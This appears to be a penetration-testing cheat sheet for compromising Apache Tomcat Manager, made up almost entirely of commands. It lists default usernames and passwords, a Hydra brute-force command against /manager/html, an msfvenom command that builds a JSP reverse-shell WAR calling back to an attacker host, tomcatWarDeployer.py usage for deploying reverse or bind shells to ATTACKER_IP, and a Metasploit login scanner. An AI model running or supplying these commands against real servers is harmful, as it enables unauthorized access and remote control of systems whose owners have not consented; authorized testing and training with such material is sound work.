1. Check Default Directories
Copy http://10.10.10.10:8080/manager
http://10.10.10.10:8080/manager.html 2. Check for Default Credentials
Some of the common usernames and passwords are:
Username List: admin, tomcat, manager, root
Password List: manager, password, root, tomcat, s3cret
3. Run Nikto Scan
Copy nikto -h http://10.10.10.10:8080 4. Generate Reverse Shell Payload
Copy sudo msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.101.112 LPORT=1234 -f war -o shelly.war 5. Brute Force with Hydra
Copy hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.10 http-get /manager/html 6. Using tomcatWarDeployer.py for Upload
The tomcatWarDeployer.py script can automate the process of uploading and deploying a reverse shell .war file to Tomcat. Clone the repository and use the script as follows:
Copy sudo git clone https://github.com/mgeeky/tomcatWarDeployer.git
cd tomcatWarDeployer To deploy a reverse shell:
Copy ./tomcatWarDeployer.py -U <username> -P <password> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:8080/manager/html/ <username>: The username for authentication.
<password>: The password for authentication.
<ATTACKER_IP>: Your attacker's IP.
<ATTACKER_PORT>: The port you want the reverse shell to connect to.
<VICTIM_IP>: The target's IP address.
For a bind shell instead of a reverse shell:
Copy ./tomcatWarDeployer.py -U <username> -P <password> -p <bind_port> <VICTIM_IP>:8080/manager/html/ Metasploit has an auxiliary scanner that can quickly check for Tomcat Manager login vulnerabilities:
Copy use auxiliary/scanner/http/tomcat_mgr_login
set RHOSTS 10.10.10.10
set USERNAME tomcat
set PASSWORD password
run